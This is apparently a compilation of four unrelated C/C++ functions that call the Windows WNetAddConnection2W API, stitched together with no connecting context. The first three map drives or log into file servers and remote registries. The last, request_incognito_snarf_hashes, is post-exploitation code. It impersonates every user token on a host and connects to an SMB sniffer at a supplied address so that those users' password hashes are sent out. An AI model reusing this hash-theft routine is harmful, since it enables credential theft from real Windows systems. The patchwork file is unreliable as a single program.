oslSecurityError SAL_CALL osl_loginUserOnFileServer(rtl_uString *strUserName,
rtl_uString *strPasswd,
rtl_uString *strFileServer,
oslSecurity *pSecurity)
{
oslSecurityError ret;
DWORD err;
NETRESOURCEW netResource;
sal_Unicode* remoteName;
sal_Unicode* userName;
remoteName = malloc((rtl_uString_getLength(strFileServer) + rtl_uString_getLength(strUserName) + 4) * sizeof(sal_Unicode));
userName = malloc((rtl_uString_getLength(strFileServer) + rtl_uString_getLength(strUserName) + 2) * sizeof(sal_Unicode));
wcscpy(remoteName, L"\\\\");
wcscat(remoteName, rtl_uString_getStr(strFileServer));
wcscat(remoteName, L"\\");
wcscat(remoteName, rtl_uString_getStr(strUserName));
wcscpy(userName, rtl_uString_getStr(strFileServer));
wcscat(userName, L"\\");
wcscat(userName, rtl_uString_getStr(strUserName));
netResource.dwScope = RESOURCE_GLOBALNET;
netResource.dwType = RESOURCETYPE_DISK;
netResource.dwDisplayType = RESOURCEDISPLAYTYPE_SHARE;
netResource.dwUsage = RESOURCEUSAGE_CONNECTABLE;
netResource.lpLocalName = NULL;
netResource.lpRemoteName = remoteName;
netResource.lpComment = NULL;
netResource.lpProvider = NULL;
err = WNetAddConnection2W(&netResource, rtl_uString_getStr(strPasswd), userName, 0);
if ((err == NO_ERROR) || (err == ERROR_ALREADY_ASSIGNED))
{
oslSecurityImpl* pSecImpl = malloc(sizeof(oslSecurityImpl));
pSecImpl->m_pNetResource = malloc(sizeof(NETRESOURCE));
*pSecImpl->m_pNetResource = netResource;
pSecImpl->m_hToken = NULL;
pSecImpl->m_hProfile = NULL;
wcscpy(pSecImpl->m_User, rtl_uString_getStr(strUserName));
*pSecurity = (oslSecurity)pSecImpl;
ret = osl_Security_E_None;
}
else
ret = osl_Security_E_UserUnknown;
free(remoteName);
free(userName);
return ret;
}
bool
DriveMapping::DoMapping()
{
wchar_t drvTemplate[] = L" :";
NETRESOURCEW netRes = {0};
netRes.dwType = RESOURCETYPE_DISK;
netRes.lpLocalName = drvTemplate;
netRes.lpRemoteName = mRemoteUNCPath.BeginWriting();
wchar_t driveLetter = L'D';
DWORD result = NO_ERROR;
do {
drvTemplate[0] = driveLetter;
result = WNetAddConnection2W(&netRes, nullptr, nullptr, CONNECT_TEMPORARY);
} while (result == ERROR_ALREADY_ASSIGNED && ++driveLetter <= L'Z');
if (result != NO_ERROR) {
return false;
}
mDriveLetter = driveLetter;
return true;
}
BOOL MRegistryBase::ConnectRemote(LPCWSTR asServer, LPCWSTR asLogin /*= NULL*/, LPCWSTR asPassword /*= NULL*/, LPCWSTR asResource /*= NULL*/)
{
if (!asServer || !*asServer)
{
InvalidOp();
return FALSE;
}
// Сначала отключиться, если было другое подключение
ConnectLocal();
while (*asServer == L'\\' || *asServer == '/') asServer++;
// The name of the remote computer. The string has the following form: \\computername
if (asServer[0])
{
sRemoteServer[0] = sRemoteServer[1] = L'\\';
lstrcpynW(sRemoteServer+2, asServer, countof(sRemoteServer)-2);
if (asLogin && *asLogin && asPassword)
{
NETRESOURCEW res = {0};
_ASSERTE(countof(sRemoteResource) > countof(sRemoteServer));
if (asResource && asResource[0] == L'\\' && asResource[1] == L'\\')
{
lstrcpynW(sRemoteResource, asResource, countof(sRemoteResource));
}
else
{
lstrcpynW(sRemoteResource, sRemoteServer, countof(sRemoteResource));
if (asResource && asResource[0] == L'\\')
{
lstrcatW(sRemoteResource, asResource);
}
else
{
lstrcatW(sRemoteResource, L"\\");
if (asResource && *asResource)
lstrcatW(sRemoteResource, asResource);
else
lstrcatW(sRemoteResource, L"IPC$");
}
}
res.dwType = RESOURCETYPE_ANY;
res.lpRemoteName = sRemoteResource;
// Подключаемся
CScreenRestore pop(GetMsg(REM_RemoteConnecting), GetMsg(REPluginName));
DWORD dwErr = WNetAddConnection2W(&res, asPassword, asLogin, CONNECT_TEMPORARY);
pop.Restore();
if (dwErr != 0)
{
REPlugin::MessageFmt(REM_LogonFailed, asLogin, dwErr, _T("RemoteConnect"));
return FALSE;
}
} else {
sRemoteResource[0] = 0;
}
}
bRemote = true;
return TRUE;
}
// Send off hashes for all tokens to IP address with SMB sniffer running
DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
{
DWORD num_tokens = 0, i;
SavedToken *token_list = NULL;
NETRESOURCEW nr;
HANDLE saved_token;
TOKEN_PRIVS token_privs;
wchar_t conn_string[BUF_SIZE] = L"", domain_name[BUF_SIZE] = L"",
return_value[BUF_SIZE] = L"", temp[BUF_SIZE] = L"";
Packet *response = packet_create_response(packet);
char *smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME);
// Initialise net_resource structure (essentially just set ip to that of smb_sniffer)
if (_snwprintf(conn_string, BUF_SIZE, L"\\\\%s", smb_sniffer_ip) == -1)
{
conn_string[BUF_SIZE - 1] = '\0';
}
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = conn_string;
// Save current thread token if one is currently being impersonated
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
packet_transmit_response(GetLastError(), remote, response);
goto cleanup;
}
// Use every token and get hashes by connecting to SMB sniffer
for (i = 0; i < num_tokens; i++)
{
if (token_list[i].token)
{
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
// XXX This may need some expansion to support other languages
if (_wcsicmp(domain_name, L"NT AUTHORITY"))
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2W(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2W(&nr, NULL, NULL, 0))
{
// Revert to primary token
RevertToSelf();
}
}
CloseHandle(token_list[i].token);
}
}
packet_transmit_response(ERROR_SUCCESS, remote, response);
cleanup:
free(token_list);
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
{
ImpersonateLoggedOnUser(saved_token);
}
return ERROR_SUCCESS;
}
